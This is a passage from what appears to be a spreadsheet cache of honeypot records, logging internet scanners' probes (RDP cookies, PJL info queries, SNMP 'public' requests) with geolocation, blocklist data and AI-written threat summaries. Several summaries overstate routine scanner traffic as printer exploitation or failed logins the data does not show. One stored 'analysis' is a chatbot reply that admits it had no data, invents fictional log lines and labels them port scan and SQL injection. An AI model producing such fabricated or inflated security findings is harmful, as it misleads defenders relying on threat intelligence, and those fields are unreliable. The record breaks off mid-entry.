    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;request&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash&amp;&amp;GET&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,61432)}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uotyZLjJS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BdKdjb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UfoZKZ'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NouNFdxKT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fPyWdC'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SpXsAy'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,60086)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,60088)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,60098)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ReCPBNXUL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MUnGyr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LryjHs'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vemyhubeC'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=emuRFg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cIWhwY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ojfFuFtLk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UumngK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pgAAtR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vHAlJVrnS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hvwsMB'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JifZpr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iMQWroJXQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vTopSS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=blCwyS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EZiejBxoJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zgFBZA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HAbDgl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FQItpzcyh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eGqyWL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zWAphf'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,65090)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,65092)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,65108)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dZDpUv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CPxyWK'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_NTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1fb8"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No recent activity detected, but presence of PJL indicates potential unauthorized access attempt or scanning for vulnerabilities. PJL is used to send commands to printers. This could be an initial probing step by a malicious actor. &amp;&amp; Possible malicious activity detected where an unknown device is attempting to send unauthorized printer commands. This could be indicative of a print job spam or exploitation attempt. Malicious script trying to gather information about the device's configuration. &amp;&amp; This log entry indicates an attempt to print information about the printer, possibly as reconnaissance for future attacks or to gather sensitive details. The activity is likely a probing action to identify and fingerprint the printer's configuration. This could be a precursor to more malicious activities such as exploitation or sabotage. &amp;&amp; This log indicates potential unauthorized printing activity, likely an attempt to print using another user's device or account, possibly through an exposed printer interface. The attacker is attempting to execute a command to retrieve device information. This may be part of a larger attack aimed at accessing and exploiting connected devices for malicious purposes. &amp;&amp; Malicious activity detected: an unauthorized command has been sent to print job processing, suggesting an attempt to access or exploit the print service for malicious purposes. The command is a PJL (Page Job Language) command that typically requests information about the printer. This could be a probe or reconnaissance attempt by an attacker. &amp;&amp; This log indicates an attempt to access the IMAP service, suggesting a potential login brute-force or reconnaissance attack is being attempted against this service. The lack of a specific user identifier (NA) implies a general probe rather than a targeted attack. This activity may be part of a larger campaign to gather credentials for other services. &amp;&amp; The user attempted to connect to a POP3 email service but was unable to authenticate. This could be a reconnaissance attempt or an automated script scanning for vulnerable services. The lack of authentication success indicates a potential issue with the user's credentials or account legitimacy. &amp;&amp; No activity detected from IMAP service, indicating potential scanning or probing attempt. _x000a_IMAP connection was not established which could be due to malicious entity trying to exploit the service._x000a_This could be indicative of a reconnaissance phase by an attacker. &amp;&amp; The attacker is attempting to determine what features are supported by the service, potentially as part of a larger reconnaissance or exploitation effort. This could be an initial step in trying to establish a connection or exploit vulnerabilities. It's likely a probing activity. &amp;&amp; Unauthorized access attempt using default community string &quot;public&quot; to gather system information from a remote location. This could be a reconnaissance probe by an attacker. Potential preparation for further malicious activity. &amp;&amp; Possible malicious activity detected, attackers attempting to send printer job commands remotely. This could be a precursor to unauthorized printing or exploitation of printer vulnerabilities. Malicious actor trying to gather information about the target system. &amp;&amp; This log indicates a potential printer exploitation attempt, possibly used for spreading malware or conducting reconnaissance._x000a_The malicious actor is attempting to manipulate the printer's settings or query its configuration._x000a_The activity suggests unauthorized access to the printer system."/>
    <s v="Port Scan &amp;&amp; Printer Attack &amp;&amp; Printer Hack &amp;&amp; Printer Exploit &amp;&amp; Scanning Attempt &amp;&amp; SNMP Attack &amp;&amp; Printer Hack &amp;&amp; Printer Scanning"/>
  </r>
  <r>
    <x v="231"/>
    <x v="231"/>
    <s v="NA&amp;&amp;salient.monitoring.internet-measurement.com"/>
    <x v="0"/>
    <d v="2025-04-30T06:53:34"/>
    <d v="2024-12-11T20:55:36"/>
    <d v="2025-04-30T06:53:34"/>
    <n v="250"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Encryption Misuse"/>
    <s v="low"/>
    <s v="SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_IRC_H2&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="9100&amp;&amp;1521&amp;&amp;5432&amp;&amp;6379&amp;&amp;25&amp;&amp;1080&amp;&amp;3306&amp;&amp;389&amp;&amp;143&amp;&amp;6667&amp;&amp;443&amp;&amp;23&amp;&amp;445&amp;&amp;NA&amp;&amp;80&amp;&amp;21&amp;&amp;5900&amp;&amp;3389"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2018-03-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;request&amp;&amp;NA&amp;&amp;GET&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.168,45231)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.21.98:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'llhwnwhn', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.168;tag=llhwnwhn', 'max-forwards': '0', 'to': 'sip:109.123.229.33', 'via': 'SIP/2.0/UDP 185.247.137.168:5060;branch=z9hG4bKllhwnwhn;received=185.247.137.168;rport=46141'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.63.23:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'pqpajtsg', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.168;tag=pqpajtsg', 'max-forwards': '0', 'to': 'sip:94.131.113.33', 'via': 'SIP/2.0/UDP 185.247.137.168:5060;branch=z9hG4bKpqpajtsg;received=185.247.137.168;rport=41242'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 66.94.127.183:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.21.98:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2021-11-25 11:34:08"/>
    <s v="2029-11-25 11:34:08"/>
    <s v="2024-10-10 09:48:31"/>
    <s v="['ALEXIS.NS.CLOUDFLARE.COM', 'RUTH.NS.CLOUDFLARE.COM']"/>
    <s v="NameCheap, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="6"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b9f7:89a8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="There is no log data provided to analyze. _x000a_The activity could not be explained based on the given information."/>
    <s v="I'd be happy to help analyze some log data! However, since you provided none, I'll create a fictional example._x000a__x000a_Let's say we have the following log data:_x000a__x000a_```_x000a_192.168.1.100 - [21/Jan/2023:14:30:00 +0000] &quot;GET / HTTP/1.1&quot; 400 443 &quot;-&quot; &quot;-&quot;_x000a_192.168.1.101 - [21/Jan/2023:15:00:00 +0000] &quot;POST /login.php HTTP/1.1&quot; 200 1234 &quot;Mozilla/5.0&quot; &quot;Malicious Script&quot;_x000a_```_x000a__x000a_Here's the analysis:_x000a__x000a_* **Port Scan**_x000a_* **SQL Injection**"/>
  </r>
  <r>
    <x v="232"/>
    <x v="232"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:51:35"/>
    <d v="2023-07-24T20:37:02"/>
    <d v="2025-04-30T06:51:35"/>
    <n v="3695"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_RDP_H24&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_RDP_H23&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_NTP_H25&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_REDIS_H25&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_SIP_H13&amp;&amp;SMA-LAB_NTP_H34&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_SNMP_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;3389&amp;&amp;9100&amp;&amp;22&amp;&amp;1825&amp;&amp;5432&amp;&amp;1521&amp;&amp;1080&amp;&amp;1433&amp;&amp;53302&amp;&amp;43055&amp;&amp;443&amp;&amp;23&amp;&amp;161&amp;&amp;6379&amp;&amp;54488&amp;&amp;41924&amp;&amp;3306&amp;&amp;NA&amp;&amp;55764&amp;&amp;54038&amp;&amp;53833&amp;&amp;110&amp;&amp;8443&amp;&amp;6667&amp;&amp;52638&amp;&amp;21&amp;&amp;389&amp;&amp;55026&amp;&amp;5900&amp;&amp;80&amp;&amp;52274&amp;&amp;445&amp;&amp;54281&amp;&amp;56979&amp;&amp;57550&amp;&amp;57321&amp;&amp;56542&amp;&amp;49794&amp;&amp;50998&amp;&amp;53838"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash&amp;&amp;GET&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uJvCGSLvC'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sqXAEP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EtjuYm'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UBeoUQPNI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WEcnyW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OfdEvv'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uWyQZvtud'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,58208)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,59244)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,59260)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,59270)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BdBxaqjDm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XfWDwN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aREcVZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mXiamP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bpRJmvhfD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WUEjLz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VboYHE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CJAPMAsOx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UEmomr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KyrVPC'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vyMNVePxq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LIuwQR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BGzEMEHFR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MtBMTl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HqQheD'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tWlylUudm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RCRPSN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: 